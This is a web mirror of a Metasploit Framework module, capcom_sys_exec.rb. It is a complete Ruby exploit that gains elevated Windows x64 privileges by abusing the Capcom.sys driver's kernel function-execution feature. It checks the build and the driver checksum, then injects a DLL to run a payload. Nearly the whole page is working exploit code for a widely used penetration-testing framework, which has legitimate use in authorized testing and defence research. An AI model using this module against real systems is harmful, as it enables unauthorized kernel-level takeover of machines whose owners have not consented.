Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/capcom_sys_exec.rb
19669 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Windows::Priv

11
  include Msf::Post::Windows::Process

12
  include Msf::Post::Windows::ReflectiveDLLInjection

13
  prepend Msf::Exploit::Remote::AutoCheck

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',

21
          'Description' => %q{

22
            This module abuses the Capcom.sys kernel driver's function that allows for an

23
            arbitrary function to be executed in the kernel from user land. This function

24
            purposely disables SMEP prior to invoking a function given by the caller.

25
            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.

26
            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.

27
          },

28
          'License' => MSF_LICENSE,

29
          'Author' => [

30
            'TheWack0lian', # Issue discovery

31
            'OJ Reeves' # exploit and msf module

32
          ],

33
          'Arch' => [ARCH_X64],

34
          'Platform' => 'win',

35
          'SessionTypes' => [ 'meterpreter' ],

36
          'DefaultOptions' => {

37
            'EXITFUNC' => 'thread'

38
          },

39
          'Targets' => [

40
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]

41
          ],

42
          'Payload' => {

43
            'Space' => 4096,

44
            'DisableNops' => true

45
          },

46
          'References' => [

47
            ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']

48
          ],

49
          'DisclosureDate' => '1999-01-01', # non-vuln exploit date

50
          'DefaultTarget' => 0,

51
          'Compat' => {

52
            'Meterpreter' => {

53
              'Commands' => %w[

54
                stdapi_fs_md5

55
                stdapi_sys_config_driver_list

56
              ]

57
            }

58
          },

59
          'Notes' => {

60
            'Reliability' => UNKNOWN_RELIABILITY,

61
            'Stability' => UNKNOWN_STABILITY,

62
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
          }

64
        }

65
      )

66
    )

67
  end

68


69
  def check

70
    return Exploit::CheckCode::Unknown unless session.platform == 'windows'

71


72
    version = get_version_info

73
    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?

74
      return Exploit::CheckCode::Unknown

75
    end

76


77
    # These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys

78
    if version.build_number > Rex::Version.new('10.0.22000.194')

79
      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')

80
    end

81


82
    if sysinfo['Architecture'] != ARCH_X64

83
      return Exploit::CheckCode::Safe

84
    end

85


86
    # Validate that the driver has been loaded and that

87
    # the version is the same as the one expected

88
    client.sys.config.getdrivers.each do |d|

89
      next unless d[:basename].downcase == 'capcom.sys'

90


91
      expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'

92
      target_checksum = client.fs.file.md5(d[:filename])

93


94
      if expected_checksum == Rex::Text.to_hex(target_checksum, '')

95
        return Exploit::CheckCode::Appears

96
      end

97
    end

98


99
    return Exploit::CheckCode::Safe

100
  end

101


102
  def exploit

103
    if is_system?

104
      fail_with(Failure::None, 'Session is already elevated')

105
    end

106


107
    check_result = check

108
    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown

109
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')

110
    end

111


112
    if sysinfo['Architecture'] == ARCH_X64

113
      if session.arch == ARCH_X86

114
        fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')

115
      end

116


117
      if target.arch.first == ARCH_X86

118
        fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')

119
      end

120
    end

121


122
    encoded_payload = payload.encoded

123
    execute_dll(

124
      ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),

125
      encoded_payload

126
    )

127


128
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')

129
  end

130
end

131


132